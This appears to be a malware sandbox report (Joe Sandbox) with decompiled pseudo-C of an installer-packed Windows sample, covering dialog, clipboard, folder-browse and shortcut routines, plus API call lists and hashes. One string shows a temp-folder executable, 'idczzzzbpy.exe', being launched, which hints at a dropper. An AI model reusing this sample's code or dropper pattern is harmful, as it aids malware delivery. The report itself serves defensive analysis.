                    				_t169 =  *0x7a7a84;
                    				_t156 = 0;
                    				_v8 = _t169;
                    				if(_a8 != 0x110) {
                    					if(_a8 == 0x405) {
                    						CloseHandle(CreateThread(0, 0, E004057A3, GetDlgItem(_a4, 0x3ec), 0,  &_v12));
                    					}
                    					if(_a8 != 0x111) {
                    						L17:
                    						_t171 = 1;
                    						if(_a8 != 0x404) {
                    							L25:
                    							if(_a8 != 0x7b) {
                    								goto L20;
                    							}
                    							_t94 = _v8;
                    							if(_a12 != _t94) {
                    								goto L20;
                    							}
                    							_t95 = SendMessageW(_t94, 0x1004, _t156, _t156);
                    							_a8 = _t95;
                    							if(_t95 <= _t156) {
                    								L36:
                    								return 0;
                    							}
                    							_t164 = CreatePopupMenu();
                    							AppendMenuW(_t164, _t156, _t171, E004066AB(_t156, _t164, _t171, _t156, 0xffffffe1));
                    							_t100 = _a16;
                    							_t159 = _a16 >> 0x10;
                    							if(_a16 == 0xffffffff) {
                    								GetWindowRect(_v8,  &_v28);
                    								_t100 = _v28.left;
                    								_t159 = _v28.top;
                    							}
                    							if(TrackPopupMenu(_t164, 0x180, _t100, _t159, _t156, _a4, _t156) == _t171) {
                    								_v60 = _t156;
                    								_v48 = 0x7a1f88;
                    								_v44 = 0x1000;
                    								_a4 = _a8;
                    								do {
                    									_a4 = _a4 - 1;
                    									_t171 = _t171 + SendMessageW(_v8, 0x1073, _a4,  &_v68) + 2;
                    								} while (_a4 != _t156);
                    								OpenClipboard(_t156);
                    								EmptyClipboard();
                    								_t108 = GlobalAlloc(0x42, _t171 + _t171);
                    								_a4 = _t108;
                    								_t172 = GlobalLock(_t108);
                    								do {
                    									_v48 = _t172;
                    									_t173 = _t172 + SendMessageW(_v8, 0x1073, _t156,  &_v68) * 2;
                    									 *_t173 = 0xd;
                    									_t175 = _t173 + 2;
                    									 *_t175 = 0xa;
                    									_t172 = _t175 + 2;
                    									_t156 = _t156 + 1;
                    								} while (_t156 < _a8);
                    								GlobalUnlock(_a4);
                    								SetClipboardData(0xd, _a4);
                    								CloseClipboard();
                    							}
                    							goto L36;
                    						}
                    						if( *0x7a7a6c == _t156) {
                    							ShowWindow( *0x7a8aa8, 8);
                    							if( *0x7a8b2c == _t156) {
                    								E004056D0( *((intOrPtr*)( *0x7a0f60 + 0x34)), _t156);
                    							}
                    							E004045A3(_t171);
                    							goto L25;
                    						}
                    						 *0x7a0758 = 2;
                    						E004045A3(0x78);
                    						goto L20;
                    					} else {
                    						if(_a12 != 0x403) {
                    							L20:
                    							return E00404631(_a8, _a12, _a16);
                    						}
                    						ShowWindow( *0x7a7a70, _t156);
                    						ShowWindow(_t169, 8);
                    						E004045FF(_t169);
                    						goto L17;
                    					}
                    				}
                    				_v52 = _v52 | 0xffffffff;
                    				_v40 = _v40 | 0xffffffff;
                    				_t177 = 2;
                    				_v60 = _t177;
                    				_v56 = 0;
                    				_v48 = 0;
                    				_v44 = 0;
                    				asm("stosd");
                    				asm("stosd");
                    				_t130 =  *0x7a8ab0;
                    				_a8 =  *((intOrPtr*)(_t130 + 0x5c));
                    				_a12 =  *((intOrPtr*)(_t130 + 0x60));
                    				 *0x7a7a70 = GetDlgItem(_a4, 0x403);
                    				 *0x7a7a68 = GetDlgItem(_a4, 0x3ee);
                    				_t134 = GetDlgItem(_a4, 0x3f8);
                    				 *0x7a7a84 = _t134;
                    				_v8 = _t134;
                    				E004045FF( *0x7a7a70);
                    				 *0x7a7a74 = E00404F58(4);
                    				 *0x7a7a8c = 0;
                    				GetClientRect(_v8,  &_v28);
                    				_v52 = _v28.right - GetSystemMetrics(_t177);
                    				SendMessageW(_v8, 0x1061, 0,  &_v60);
                    				SendMessageW(_v8, 0x1036, 0x4000, 0x4000);
                    				if(_a8 >= 0) {
                    					SendMessageW(_v8, 0x1001, 0, _a8);
                    					SendMessageW(_v8, 0x1026, 0, _a8);
                    				}
                    				if(_a12 >= _t156) {
                    					SendMessageW(_v8, 0x1024, _t156, _a12);
                    				}
                    				_push( *((intOrPtr*)(_a16 + 0x30)));
                    				_push(0x1b);
                    				E004045CA(_a4);
                    				if(( *0x7a8ab8 & 0x00000003) != 0) {
                    					ShowWindow( *0x7a7a70, _t156);
                    					if(( *0x7a8ab8 & 0x00000002) != 0) {
                    						 *0x7a7a70 = _t156;
                    					} else {
                    						ShowWindow(_v8, 8);
                    					}
                    					E004045FF( *0x7a7a68);
                    				}
                    				_t168 = GetDlgItem(_a4, 0x3ec);
                    				SendMessageW(_t168, 0x401, _t156, 0x75300000);
                    				if(( *0x7a8ab8 & 0x00000004) != 0) {
                    					SendMessageW(_t168, 0x409, _t156, _a12);
                    					SendMessageW(_t168, 0x2001, _t156, _a8);
                    				}
                    				goto L36;
                    			}


































                    APIs
                    • GetDlgItem.USER32 ref: 0040586D
                    • GetDlgItem.USER32 ref: 0040587C
                    • GetClientRect.USER32 ref: 004058B9
                    • GetSystemMetrics.USER32 ref: 004058C0
                    • SendMessageW.USER32(?,00001061,00000000,?), ref: 004058E1
                    • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004058F2
                    • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 00405905
                    • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 00405913
                    • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405926
                    • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405948
                    • ShowWindow.USER32(?,00000008), ref: 0040595C
                    • GetDlgItem.USER32 ref: 0040597D
                    • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040598D
                    • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004059A6
                    • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004059B2
                    • GetDlgItem.USER32 ref: 0040588B
                      • Part of subcall function 004045FF: SendMessageW.USER32(00000028,?,00000001,0040442A), ref: 0040460D
                    • GetDlgItem.USER32 ref: 004059CF
                    • CreateThread.KERNEL32 ref: 004059DD
                    • CloseHandle.KERNEL32(00000000), ref: 004059E4
                    • ShowWindow.USER32(00000000), ref: 00405A08
                    • ShowWindow.USER32(?,00000008), ref: 00405A0D
                    • ShowWindow.USER32(00000008), ref: 00405A57
                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405A8B
                    • CreatePopupMenu.USER32 ref: 00405A9C
                    • AppendMenuW.USER32 ref: 00405AB0
                    • GetWindowRect.USER32 ref: 00405AD0
                    • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405AE9
                    • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405B21
                    • OpenClipboard.USER32(00000000), ref: 00405B31
                    • EmptyClipboard.USER32 ref: 00405B37
                    • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405B43
                    • GlobalLock.KERNEL32 ref: 00405B4D
                    • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405B61
                    • GlobalUnlock.KERNEL32(00000000), ref: 00405B81
                    • SetClipboardData.USER32(0000000D,00000000), ref: 00405B8C
                    • CloseClipboard.USER32 ref: 00405B92
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.260738972.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.260734428.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.260747957.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.260784814.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.260791797.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.261016633.000000000077C000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.261025813.0000000000782000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.261032739.0000000000786000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.261037968.0000000000789000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.261051766.00000000007A6000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.261058159.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.261063898.00000000007B5000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.261068161.00000000007B9000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_inlaww321345.jbxd
                    Similarity
                    • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                    • String ID: {
                    • API String ID: 590372296-366298937
                    • Opcode ID: a77729b42b97d1460badf31275b058d201800e7c8612f90bf0790785bfc588e5
                    • Instruction ID: f3bb878df23a29f955279a02cf148875578f9ab87112c8cbe183df0a3e5e7c84
                    • Opcode Fuzzy Hash: a77729b42b97d1460badf31275b058d201800e7c8612f90bf0790785bfc588e5
                    • Instruction Fuzzy Hash: 7DB16BB1900608FFDF119F64DD89AAE7B79FB45354F00802AFA41BA1A0CB785E51DF68
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 78%
                    			E00404ABB(unsigned int __edx, struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
                    				signed int _v8;
                    				signed int _v12;
                    				long _v16;
                    				long _v20;
                    				long _v24;
                    				char _v28;
                    				intOrPtr _v32;
                    				long _v36;
                    				char _v40;
                    				unsigned int _v44;
                    				signed int _v48;
                    				WCHAR* _v56;
                    				intOrPtr _v60;
                    				intOrPtr _v64;
                    				intOrPtr _v68;
                    				WCHAR* _v72;
                    				void _v76;
                    				struct HWND__* _v80;
                    				void* __ebx;
                    				void* __edi;
                    				void* __esi;
                    				intOrPtr _t82;
                    				long _t87;
                    				short* _t89;
                    				void* _t95;
                    				signed int _t96;
                    				int _t109;
                    				signed short _t114;
                    				signed int _t118;
                    				struct HWND__** _t122;
                    				intOrPtr* _t138;
                    				WCHAR* _t146;
                    				unsigned int _t150;
                    				signed int _t152;
                    				unsigned int _t156;
                    				signed int _t158;
                    				signed int* _t159;
                    				signed int* _t160;
                    				struct HWND__* _t166;
                    				struct HWND__* _t167;
                    				int _t169;
                    				unsigned int _t197;
                    
                    				_t156 = __edx;
                    				_t82 =  *0x7a0f60;
                    				_v32 = _t82;
                    				_t146 = ( *(_t82 + 0x3c) << 0xb) + 0x7a9000;
                    				_v12 =  *((intOrPtr*)(_t82 + 0x38));
                    				if(_a8 == 0x40b) {
                    					E00405CB2(0x3fb, _t146);
                    					E004068F5(_t146);
                    				}
                    				_t167 = _a4;
                    				if(_a8 != 0x110) {
                    					L8:
                    					if(_a8 != 0x111) {
                    						L20:
                    						if(_a8 == 0x40f) {
                    							L22:
                    							_v8 = _v8 & 0x00000000;
                    							_v12 = _v12 & 0x00000000;
                    							E00405CB2(0x3fb, _t146);
                    							if(E00406045(_t186, _t146) == 0) {
                    								_v8 = 1;
                    							}
                    							E0040666E(0x79ff58, _t146);
                    							_t87 = E00406A3B(1);
                    							_v16 = _t87;
                    							if(_t87 == 0) {
                    								L30:
                    								E0040666E(0x79ff58, _t146);
                    								_t89 = E00405FE8(0x79ff58);
                    								_t158 = 0;
                    								if(_t89 != 0) {
                    									 *_t89 = 0;
                    								}
                    								if(GetDiskFreeSpaceW(0x79ff58,  &_v20,  &_v24,  &_v16,  &_v36) == 0) {
                    									goto L35;
                    								} else {
                    									_t169 = 0x400;
                    									_t109 = MulDiv(_v20 * _v24, _v16, 0x400);
                    									asm("cdq");
                    									_v48 = _t109;
                    									_v44 = _t156;
                    									_v12 = 1;
                    									goto L36;
                    								}
                    							} else {
                    								_t159 = 0;
                    								if(0 == 0x79ff58) {
                    									goto L30;
                    								} else {
                    									goto L26;
                    								}
                    								while(1) {
                    									L26:
                    									_t114 = _v16(0x79ff58,  &_v48,  &_v28,  &_v40);
                    									if(_t114 != 0) {
                    										break;
                    									}
                    									if(_t159 != 0) {
                    										 *_t159 =  *_t159 & _t114;
                    									}
                    									_t160 = E00405F89(0x79ff58);
                    									 *_t160 =  *_t160 & 0x00000000;
                    									_t159 = _t160;
                    									 *_t159 = 0x5c;
                    									if(_t159 != 0x79ff58) {
                    										continue;
                    									} else {
                    										goto L30;
                    									}
                    								}
                    								_t150 = _v44;
                    								_v48 = (_t150 << 0x00000020 | _v48) >> 0xa;
                    								_v44 = _t150 >> 0xa;
                    								_v12 = 1;
                    								_t158 = 0;
                    								__eflags = 0;
                    								L35:
                    								_t169 = 0x400;
                    								L36:
                    								_t95 = E00404F58(5);
                    								if(_v12 != _t158) {
                    									_t197 = _v44;
                    									if(_t197 <= 0 && (_t197 < 0 || _v48 < _t95)) {
                    										_v8 = 2;
                    									}
                    								}
                    								if( *((intOrPtr*)( *0x7a7a7c + 0x10)) != _t158) {
                    									E00404F40(0x3ff, 0xfffffffb, _t95);
                    									if(_v12 == _t158) {
                    										SetDlgItemTextW(_a4, _t169, 0x79ff48);
                    									} else {
                    										E00404E77(_t169, 0xfffffffc, _v48, _v44);
                    									}
                    								}
                    								_t96 = _v8;
                    								 *0x7a8b44 = _t96;
                    								if(_t96 == _t158) {
                    									_v8 = E0040140B(7);
                    								}
                    								if(( *(_v32 + 0x14) & _t169) != 0) {
                    									_v8 = _t158;
                    								}
                    								E004045EC(0 | _v8 == _t158);
                    								if(_v8 == _t158 &&  *0x7a1f78 == _t158) {
                    									E00404A14();
                    								}
                    								 *0x7a1f78 = _t158;
                    								goto L53;
                    							}
                    						}
                    						_t186 = _a8 - 0x405;
                    						if(_a8 != 0x405) {
                    							goto L53;
                    						}
                    						goto L22;
                    					}
                    					_t118 = _a12 & 0x0000ffff;
                    					if(_t118 != 0x3fb) {
                    						L12:
                    						if(_t118 == 0x3e9) {
                    							_t152 = 7;
                    							memset( &_v76, 0, _t152 << 2);
                    							_v80 = _t167;
                    							_v72 = 0x7a1f88;
                    							_v60 = E00404E11;
                    							_v56 = _t146;
                    							_v68 = E004066AB(_t146, 0x7a1f88, _t167, 0x7a0760, _v12);
                    							_t122 =  &_v80;
                    							_v64 = 0x41;
                    							__imp__SHBrowseForFolderW(_t122);
                    							if(_t122 == 0) {
                    								_a8 = 0x40f;
                    							} else {
                    								__imp__CoTaskMemFree(_t122);
                    								E00405F3D(_t146);
                    								_t125 =  *((intOrPtr*)( *0x7a8ab0 + 0x11c));
                    								if( *((intOrPtr*)( *0x7a8ab0 + 0x11c)) != 0 && _t146 == L"C:\\Users\\hardz\\AppData\\Local\\Temp") {
                    									E004066AB(_t146, 0x7a1f88, _t167, 0, _t125);
                    									if(lstrcmpiW(0x7a6a40, 0x7a1f88) != 0) {
                    										lstrcatW(_t146, 0x7a6a40);
                    									}
                    								}
                    								 *0x7a1f78 =  *0x7a1f78 + 1;
                    								SetDlgItemTextW(_t167, 0x3fb, _t146);
                    							}
                    						}
                    						goto L20;
                    					}
                    					if(_a12 >> 0x10 != 0x300) {
                    						goto L53;
                    					}
                    					_a8 = 0x40f;
                    					goto L12;
                    				} else {
                    					_t166 = GetDlgItem(_t167, 0x3fb);
                    					if(E00405FB4(_t146) != 0 && E00405FE8(_t146) == 0) {
                    						E00405F3D(_t146);
                    					}
                    					 *0x7a7a78 = _t167;
                    					SetWindowTextW(_t166, _t146);
                    					_push( *((intOrPtr*)(_a16 + 0x34)));
                    					_push(1);
                    					E004045CA(_t167);
                    					_push( *((intOrPtr*)(_a16 + 0x30)));
                    					_push(0x14);
                    					E004045CA(_t167);
                    					E004045FF(_t166);
                    					_t138 = E00406A3B(8);
                    					if(_t138 == 0) {
                    						L53:
                    						return E00404631(_a8, _a12, _a16);
                    					} else {
                    						 *_t138(_t166, 1);
                    						goto L8;
                    					}
                    				}
                    			}

                    APIs
                    • GetDlgItem.USER32 ref: 00404B0A
                    • SetWindowTextW.USER32(00000000,?), ref: 00404B34
                    • SHBrowseForFolderW.SHELL32(?), ref: 00404BE5
                    • CoTaskMemFree.OLE32(00000000), ref: 00404BF0
                    • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe C:\Users\user\AppData\Local\Temp\naxsk,007A1F88,00000000,?,?), ref: 00404C22
                    • lstrcatW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe C:\Users\user\AppData\Local\Temp\naxsk), ref: 00404C2E
                    • SetDlgItemTextW.USER32 ref: 00404C40
                      • Part of subcall function 00405CB2: GetDlgItemTextW.USER32 ref: 00405CC5
                      • Part of subcall function 004068F5: CharNextW.USER32(?,*?|<>/":,00000000,00000000,7620FAA0,C:\Users\user\AppData\Local\Temp\,?,00403621,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403929), ref: 00406958
                      • Part of subcall function 004068F5: CharNextW.USER32(?,?,?,00000000,?,00403621,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403929), ref: 00406967
                      • Part of subcall function 004068F5: CharNextW.USER32(?,00000000,7620FAA0,C:\Users\user\AppData\Local\Temp\,?,00403621,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403929), ref: 0040696C
                      • Part of subcall function 004068F5: CharPrevW.USER32(?,?,7620FAA0,C:\Users\user\AppData\Local\Temp\,?,00403621,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403929), ref: 0040697F
                    • GetDiskFreeSpaceW.KERNEL32(0079FF58,?,?,0000040F,?,0079FF58,0079FF58,?,00000001,0079FF58,?,?,000003FB,?), ref: 00404D03
                    • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404D1E
                      • Part of subcall function 00404E77: lstrlenW.KERNEL32(007A1F88,007A1F88,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404F18
                      • Part of subcall function 00404E77: wsprintfW.USER32 ref: 00404F21
                      • Part of subcall function 00404E77: SetDlgItemTextW.USER32 ref: 00404F34
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.260738972.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.260734428.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.260747957.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.260784814.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.260791797.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.261016633.000000000077C000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.261025813.0000000000782000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.261032739.0000000000786000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.261037968.0000000000789000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.261051766.00000000007A6000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.261058159.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.261063898.00000000007B5000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.261068161.00000000007B9000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_inlaww321345.jbxd
                    Similarity
                    • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                    • String ID: A$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe C:\Users\user\AppData\Local\Temp\naxsk
                    • API String ID: 2624150263-1432775139
                    • Opcode ID: 1c3e24ea3c91ff4ce813832bee9d1a6c89b271b1ee61e594e0d9cbeb6062d674
                    • Instruction ID: 4ef08ca0e285fb36132dd1072a135484aded6f5102cec428142970bb06395e88
                    • Opcode Fuzzy Hash: 1c3e24ea3c91ff4ce813832bee9d1a6c89b271b1ee61e594e0d9cbeb6062d674
                    • Instruction Fuzzy Hash: 77A182B1901209ABEB11AFA5CD45AEF77B9EF84314F11803BF601B62D1DB7C89418B69
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 67%
                    			E004021AA() {
                    				signed int _t52;
                    				void* _t56;
                    				intOrPtr* _t60;
                    				intOrPtr _t61;
                    				intOrPtr* _t62;
                    				intOrPtr* _t64;
                    				intOrPtr* _t66;
                    				intOrPtr* _t68;
                    				intOrPtr* _t70;
                    				intOrPtr* _t72;
                    				intOrPtr* _t74;
                    				intOrPtr* _t76;
                    				intOrPtr* _t78;
                    				intOrPtr* _t80;
                    				void* _t83;
                    				intOrPtr* _t91;
                    				signed int _t101;
                    				signed int _t105;
                    				void* _t107;
                    
                    				 *((intOrPtr*)(_t107 - 0x10)) = E00402DA6(0xfffffff0);
                    				 *((intOrPtr*)(_t107 - 0x44)) = E00402DA6(0xffffffdf);
                    				 *((intOrPtr*)(_t107 - 8)) = E00402DA6(2);
                    				 *((intOrPtr*)(_t107 - 0x4c)) = E00402DA6(0xffffffcd);
                    				 *((intOrPtr*)(_t107 - 0xc)) = E00402DA6(0x45);
                    				_t52 =  *(_t107 - 0x20);
                    				 *(_t107 - 0x50) = _t52 & 0x00000fff;
                    				_t101 = _t52 & 0x00008000;
                    				_t105 = _t52 >> 0x0000000c & 0x00000007;
                    				 *(_t107 - 0x40) = _t52 >> 0x00000010 & 0x0000ffff;
                    				if(E00405FB4( *((intOrPtr*)(_t107 - 0x44))) == 0) {
                    					E00402DA6(0x21);
                    				}
                    				_t56 = _t107 + 8;
                    				__imp__CoCreateInstance(0x4084e4, _t83, 1, 0x4084d4, _t56);
                    				if(_t56 < _t83) {
                    					L14:
                    					 *((intOrPtr*)(_t107 - 4)) = 1;
                    					_push(0xfffffff0);
                    				} else {
                    					_t60 =  *((intOrPtr*)(_t107 + 8));
                    					_t61 =  *((intOrPtr*)( *_t60))(_t60, 0x4084f4, _t107 - 0x38);
                    					 *((intOrPtr*)(_t107 - 0x18)) = _t61;
                    					if(_t61 >= _t83) {
                    						_t64 =  *((intOrPtr*)(_t107 + 8));
                    						 *((intOrPtr*)(_t107 - 0x18)) =  *((intOrPtr*)( *_t64 + 0x50))(_t64,  *((intOrPtr*)(_t107 - 0x44)));
                    						if(_t101 == _t83) {
                    							_t80 =  *((intOrPtr*)(_t107 + 8));
                    							 *((intOrPtr*)( *_t80 + 0x24))(_t80, 0x7b4000);
                    						}
                    						if(_t105 != _t83) {
                    							_t78 =  *((intOrPtr*)(_t107 + 8));
                    							 *((intOrPtr*)( *_t78 + 0x3c))(_t78, _t105);
                    						}
                    						_t66 =  *((intOrPtr*)(_t107 + 8));
                    						 *((intOrPtr*)( *_t66 + 0x34))(_t66,  *(_t107 - 0x40));
                    						_t91 =  *((intOrPtr*)(_t107 - 0x4c));
                    						if( *_t91 != _t83) {
                    							_t76 =  *((intOrPtr*)(_t107 + 8));
                    							 *((intOrPtr*)( *_t76 + 0x44))(_t76, _t91,  *(_t107 - 0x50));
                    						}
                    						_t68 =  *((intOrPtr*)(_t107 + 8));
                    						 *((intOrPtr*)( *_t68 + 0x2c))(_t68,  *((intOrPtr*)(_t107 - 8)));
                    						_t70 =  *((intOrPtr*)(_t107 + 8));
                    						 *((intOrPtr*)( *_t70 + 0x1c))(_t70,  *((intOrPtr*)(_t107 - 0xc)));
                    						if( *((intOrPtr*)(_t107 - 0x18)) >= _t83) {
                    							_t74 =  *((intOrPtr*)(_t107 - 0x38));
                    							 *((intOrPtr*)(_t107 - 0x18)) =  *((intOrPtr*)( *_t74 + 0x18))(_t74,  *((intOrPtr*)(_t107 - 0x10)), 1);
                    						}
                    						_t72 =  *((intOrPtr*)(_t107 - 0x38));
                    						 *((intOrPtr*)( *_t72 + 8))(_t72);
                    					}
                    					_t62 =  *((intOrPtr*)(_t107 + 8));
                    					 *((intOrPtr*)( *_t62 + 8))(_t62);
                    					if( *((intOrPtr*)(_t107 - 0x18)) >= _t83) {
                    						_push(0xfffffff4);
                    					} else {
                    						goto L14;
                    					}
                    				}
                    				E00401423();
                    				 *0x7a8b28 =  *0x7a8b28 +  *((intOrPtr*)(_t107 - 4));
                    				return 0;
                    			}

                    APIs
                    • CoCreateInstance.OLE32(004084E4,?,00000001,004084D4,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402229
                    Memory Dump Source
                    • Source File: 00000000.00000002.260738972.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.260734428.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.260747957.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.260784814.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.260791797.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.261016633.000000000077C000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.261025813.0000000000782000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.261032739.0000000000786000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.261037968.0000000000789000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.261051766.00000000007A6000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.261058159.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.261063898.00000000007B5000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.261068161.00000000007B9000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_inlaww321345.jbxd
                    Similarity
                    • API ID: CreateInstance
                    • String ID:
                    • API String ID: 542301482-0
                    • Opcode ID: 95206bf645e1c446277479694b40913283949515a1362953c4f2174f782b348b
                    • Instruction ID: c9e7058f2ccac2017f9d88f2873359e197591af4de9cbf84fabb751e216ccc72
                    • Opcode Fuzzy Hash: 95206bf645e1c446277479694b40913283949515a1362953c4f2174f782b348b
                    • Instruction Fuzzy Hash: A1411571A00209EFCF40DFE4C989E9D7BB5BF49304B2045AAF505EB2D1DB799981CB94
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 39%
                    			E0040290B(short __ebx, short* __edi) {
                    				void* _t21;
                    
                    				if(FindFirstFileW(E00402DA6(2), _t21 - 0x2dc) != 0xffffffff) {
                    					E004065B5( *((intOrPtr*)(_t21 - 0xc)), _t8);
                    					_push(_t21 - 0x2b0);
                    					_push(__edi);
                    					E0040666E();
                    				} else {
                    					 *((short*)( *((intOrPtr*)(_t21 - 0xc)))) = __ebx;
                    					 *__edi = __ebx;
                    					 *((intOrPtr*)(_t21 - 4)) = 1;
                    				}
                    				 *0x7a8b28 =  *0x7a8b28 +  *((intOrPtr*)(_t21 - 4));
                    				return 0;
                    			}

                    APIs
                    • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 0040291A
                    Memory Dump Source
                    • Source File: 00000000.00000002.260738972.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.260734428.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.260747957.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.260784814.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.260791797.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.261016633.000000000077C000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.261025813.0000000000782000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.261032739.0000000000786000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.261037968.0000000000789000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.261051766.00000000007A6000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.261058159.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.261063898.00000000007B5000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.261068161.00000000007B9000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_inlaww321345.jbxd
                    Similarity
                    • API ID: FileFindFirst
                    • String ID:
                    • API String ID: 1974802433-0
                    • Opcode ID: 886e1da82f87bd9a052d385c947725ec3f25a605ee36621127924a1c8a89904e
                    • Instruction ID: 9ced82c77f1422a0303d0e50afa4302c42ae01a582b6fde34da312f05d76664a
                    • Opcode Fuzzy Hash: 886e1da82f87bd9a052d385c947725ec3f25a605ee36621127924a1c8a89904e
                    • Instruction Fuzzy Hash: 5CF05E71904104EAD701DBA4E949AAEB378EF15314F20457BE101F21D0EBB88E119B29
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 96%
                    			E00405037(struct HWND__* _a4, int _a8, signed int _a12, int _a16) {
                    				struct HWND__* _v8;
                    				struct HWND__* _v12;
                    				long _v16;
                    				signed int _v20;
                    				signed int _v24;
                    				intOrPtr _v28;
                    				signed char* _v32;
                    				int _v36;
                    				signed int _v44;
                    				int _v48;
                    				signed int* _v60;
                    				signed char* _v64;
                    				signed int _v68;
                    				long _v72;
                    				void* _v76;
                    				intOrPtr _v80;
                    				intOrPtr _v84;
